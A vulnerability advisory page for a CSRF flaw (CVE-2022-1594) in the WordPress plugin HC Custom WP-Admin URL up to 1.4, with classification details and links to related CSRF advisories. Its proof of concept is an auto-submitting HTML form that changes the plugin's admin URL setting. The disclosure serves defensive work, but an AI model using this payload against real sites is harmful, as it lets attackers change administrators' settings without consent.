WordPress Plugin Vulnerabilities

HC Custom WP-Admin URL <= 1.4 - Unauthenticated Arbitrary Settings Update via CSRF

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions via CSRF attacks

Proof of Concept

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="custom_wpadmin_slug" value="secret">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
hc-custom-wp-admin-url
No known fix

References

CVE
CVE-2022-1594

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
bb0efc5e-044b-47dc-9101-9aae40cdbaa5

Timeline

Publicly Published
2022-05-18 (about 2 years ago)
Added
2022-05-18 (about 2 years ago)
Last Updated
2023-02-09 (about 1 years ago)

Other

Published
Title
Published
2023-02-27
Title
Read More Excerpt Link < 1.6.1 - Settings Update via CSRF
Published
2019-12-26
Title
bbPress Members Only < 1.3.1 - CSRF on Optional Settings page
Published
2014-08-01
Title
WP DS FAQ Plus 1.0.3 - Multiple Unspecified CSRF
Published
2023-11-28
Title
Business Directory Plugin < 6.3.11 - Cross-Site Request Forgery
Published
2014-08-01
Title
User Role Editor - Cross-Site Request Forgery